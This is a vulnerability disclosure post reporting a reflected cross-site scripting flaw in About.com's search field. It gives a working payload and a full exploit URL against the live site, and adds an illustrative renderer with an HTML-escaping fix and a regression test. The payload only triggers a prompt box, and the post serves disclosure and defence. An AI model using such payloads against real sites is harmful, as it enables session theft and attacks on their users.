About Group About.com Main Page’s Search Field XSS (Cross-Site Scripting) Security Vulnerabilities

(1) Domain Description:
http://www.about.com/

 

“For March 2014, 61,428,000 unique visitors were registered by comScore for About.com, making it the 16th-most-visited online property for that month.” (The New York Times)

 

“About.com, also known as The About Group (formerly About Inc.), is an Internet-based network of content that publishes articles and videos about various subjects on its “topic sites,” of which there are nearly 1,000. The website competes with other online resource sites and encyclopedias, including those of the Wikimedia Foundation” (Wikipedia)

 

“As of May 2013, About.com was receiving about 84 million unique monthly visitors.” (TechCrunch. AOL Inc.)

 

“According to About’s online media kit, nearly 1,000 “Experts” (freelance writers) contribute to the site by writing on various topics, including healthcare and travel.” (About.com)

 

 


(2) Result of Exploiting XSS Attacks

“Exploited XSS is commonly used to achieve the following malicious results

Identity theft

Accessing sensitive or restricted information

Gaining free access to otherwise paid for content

Spying on user’s web browsing habits

Altering browser functionality

Public defamation of an individual or corporation

Web application defacement

Denial of Service attacks (DOS)

” (Acunetix)

 

 

 

(3) Vulnerabilities Details:

About Group's website About.com has a security vulnerability that can be exploited by XSS (cross-site scripting) attacks.

The vulnerability can be exploited without user login. Tests were performed on Mozilla Firefox (33.0) in Ubuntu (14.04) and Microsoft IE (9.0.15) in Windows 7.

 

The vulnerability occurs in the search field of the about.com main page, e.g.
http://www.about.com/?q=googleandroidsystem

 

 

PoC code, e.g.

"--/>"><img src=x onerror=prompt(/tetraph/)>

http://www.about.com/?q="--/>"><img src=x onerror=prompt(/tetraph/)>
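
The reflection described above, as an added example (not About.com's code and not part of the original post): a hypothetical renderer places the `q` parameter in a quoted `value` attribute, first without and then with HTML encoding. The function names and the search-box markup are assumptions.

```javascript
// Added example: hypothetical search-page renderer, not About.com's code.

// Extract the q parameter the way a server framework would (percent-decoded).
function queryFromUrl(url) {
  return new URL(url).searchParams.get('q') || '';
}

// Encode the five characters that can change the HTML parsing context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable form: q is concatenated into the attribute as-is, so a
// double quote ends the attribute and '>' ends the <input> tag.
function renderSearchVulnerable(q) {
  return '<input type="text" name="q" value="' + q + '">';
}

// Hardened form: q is HTML-encoded before it reaches the attribute.
function renderSearchSafe(q) {
  return '<input type="text" name="q" value="' + escapeHtml(q) + '">';
}

// Regression check for a test suite: the fragment must contain exactly
// one tag (the input). Any extra tag means user input became markup.
function countTags(html) {
  return (html.match(/<[a-zA-Z][^>]*>/g) || []).length;
}

// The PoC string published on this page, used here as test input.
const poc = '"--/>"><img src=x onerror=prompt(/tetraph/)>';
const q = queryFromUrl('http://www.about.com/?q=' + poc);

console.log('vulnerable tags:', countTags(renderSearchVulnerable(q)));
console.log('hardened tags:  ', countTags(renderSearchSafe(q)));
console.log(renderSearchSafe(q));
```

In the hardened output the whole payload stays inside the `value` attribute as text, so the browser shows it in the search box instead of parsing an `<img>` element.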

 

POC Video:
https://www.youtube.com/watch?v=H4G7b_Jkqvw&feature=youtu.be

 

Blog Details:
http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-main-pages-search.html
http://securitypitch.com/about-group-about-com-content-network-vulnerable-to-xss-iframe-injection-security-attacks-433/

 

 

 

Vulnerability Disclosure:
These vulnerabilities were reported to About on Sunday, Oct 19, 2014. No one replied. At the time of writing, they are still unpatched.

 

 

Vulnerability Discoverer:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (@justqdjing)
http://www.tatraph.com/wangjing

 

 

 

Wang Jing
